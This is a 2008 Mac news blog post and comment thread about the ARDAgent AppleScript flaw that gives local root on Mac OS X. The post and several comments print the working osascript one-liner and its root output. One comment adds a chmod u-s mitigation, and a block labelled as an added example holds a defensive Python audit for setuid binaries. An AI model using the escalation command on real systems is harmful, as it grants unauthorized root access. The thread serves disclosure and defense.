MacUser
News, info, and opinion by Mac users, for Mac users.

Root escalation through AppleScript

Posted by Derik DeLong | Thursday, June 19, 2008 5:27 AM PT

There’s currently a serious problem with Apple Remote Desktop: it can be used to gain root privileges without having actual permission to do so. All you need to do is ask it nicely, via AppleScript, to do something nasty.

osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

Voila! The shell script in question is run as root. No authentication required. This exploit requires physical access to the machine. That’s of some comfort, but not a huge amount. This is a foolish feature of ARD’s AppleScript support.

Generally you have worse things to worry about if someone has physical access to your computer, but this needs to be fixed nonetheless. You can actually protect yourself by archiving and removing ARD (located in /System/Library/CoreServices/RemoteManagement/).

Let’s hope Apple fixes this in a security update soon.

Comments (8)


Pixar hope
June 19, 2008
9:40 AM PT

Please clarify this command. I've run it repeatedly on multiple machines running both Tiger and Leopard, PowerPC and Intel, Server and Client, and I cannot get it to execute. I get the following error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

This is after I've cleaned up the example which contains smart quotes. If this exploit is proven, I want to file a bug but if I can't duplicate it, I'll be wasting my time.

dsuggs
June 19, 2008
10:22 AM PT

I do not buy this. I tried it and it didn't work.

You cannot send Unix commands to an ARD client unless you are authenticated AND you have ALL the check boxes checked for the user in question inside Remote Management under the Sharing pref pane.

If you have all the boxes checked, the user can send Unix commands as root even if it's a standard user on the system. This may be the "security" problem you're actually referring to, since a std. user will have root access over a network instead of the std. user rights the user has at the box itself.

Here's the thing though: in order for the std. user to get this access, an admin user has to grant it by checking all the boxes under Remote Management. A std. user cannot set this. If an admin user is ignorant it is a problem, but otherwise it is not.

In my opinion there should be a warning to the admin for allowing this access as a std. user, but it should be allowed.

duel1ghz
June 19, 2008
11:38 AM PT

It does work.

$ uname -a
Darwin mymac.local 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386 i386
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root

That's on Mac OS X 10.5.3

LT
June 19, 2008
1:18 PM PT

I've managed to sort this out and if someone has physical access to the machine with an active login session, this exploit does execute as advertised.

Remote Management must be disabled in order for this to work. I applied all updates to a Tiger machine, restarted, and entered the osascript as described above. The response was "root". Not good. I then created a second non-admin account, ran the command, and again could execute the script with root privileges. It's time to file my bug.

dsuggs
June 19, 2008
1:34 PM PT

Works for me.

osascript -e 'tell app "ARDAgent" to do shell script "echo Mwahahah"'

June 19, 2008
1:58 PM PT

duel, you cannot believe it, but I just tried it on my Leopard MBP and I get the following:

In the script editor:

tell application "ARDAgent" to do shell script "whoami;id"

result:
"root
uid=0(root) gid=0(wheel) egid=502(_myusrname) groups=0(wheel),1(daemon),8(procview),2(kmem),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff),101(com.apple.sharepoint.group.1)"

This is the easiest local root exploit I've ever seen. Beware.

James Bailey
June 19, 2008
2:59 PM PT

I was able to reproduce this without having any of the "Sharing" services enabled. The problem is that the ARDAgent executable has the UNIX "s" permission set, meaning that when the program is executed it will run as the "owner" of the file rather than the current user. Some programs require this permission to work, but they should be hardened against allowing arbitrary command execution which is not the case with ARDAgent.

If you don't need Remote Management, an easy fix is to remove the "s" permission:

$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root
$ sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
Password:
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
mgood
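As an added example (not code from the post or from this comment), here is a small audit for the misconfiguration class described above: setuid executables living inside scriptable .app bundles, together with the chmod u-s mitigation. The NSAppleScriptEnabled Info.plist check is an assumed heuristic for "accepts Apple events", and the sample bundle tree is constructed, not taken from a real system.

```python
import os
import plistlib
import stat
import tempfile
from pathlib import Path

def bundle_is_scriptable(bundle):
    """Assumed heuristic: the bundle's Info.plist declares NSAppleScriptEnabled."""
    plist = bundle / "Contents" / "Info.plist"
    if not plist.is_file():
        return False
    with open(plist, "rb") as fh:
        info = plistlib.load(fh)
    return info.get("NSAppleScriptEnabled") in (True, "YES")

def find_setuid_in_bundles(root, require_root_owner=True):
    """Report (path, owner_uid, scriptable) for every setuid regular file under root.

    The dangerous combination, as with ARDAgent, is a root-owned setuid binary
    inside a bundle that accepts Apple events such as 'do shell script'."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath, name)
            st = p.lstat()                     # do not follow symlinks
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if require_root_owner and st.st_uid != 0:
                continue
            bundle = next((a for a in p.parents if a.suffix == ".app"), None)
            findings.append((str(p), st.st_uid, bundle is not None and bundle_is_scriptable(bundle)))
    return findings

def clear_setuid(path):
    """The mitigation from the comment above (chmod u-s); True once the bit is gone."""
    os.chmod(path, os.stat(path).st_mode & ~stat.S_ISUID)
    return not os.stat(path).st_mode & stat.S_ISUID

def build_sample_tree():
    """Constructed fixture: two fake bundles with setuid executables, one scriptable."""
    base = Path(tempfile.mkdtemp())
    for app, scriptable in (("Scriptable.app", True), ("Plain.app", False)):
        macos = base / app / "Contents" / "MacOS"
        macos.mkdir(parents=True)
        info = {"CFBundleIdentifier": "example." + app, "NSAppleScriptEnabled": scriptable}
        with open(base / app / "Contents" / "Info.plist", "wb") as fh:
            plistlib.dump(info, fh)
        (macos / "agent").write_text("#!/bin/sh\necho fixture\n")
        os.chmod(macos / "agent", 0o4755)   # setuid bit set, as ARDAgent had
    return str(base)
```

On a real system you would run find_setuid_in_bundles("/System/Library/CoreServices") with the default require_root_owner=True; the fixture passes False because it is owned by the current user.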

June 20, 2008
10:47 AM PT
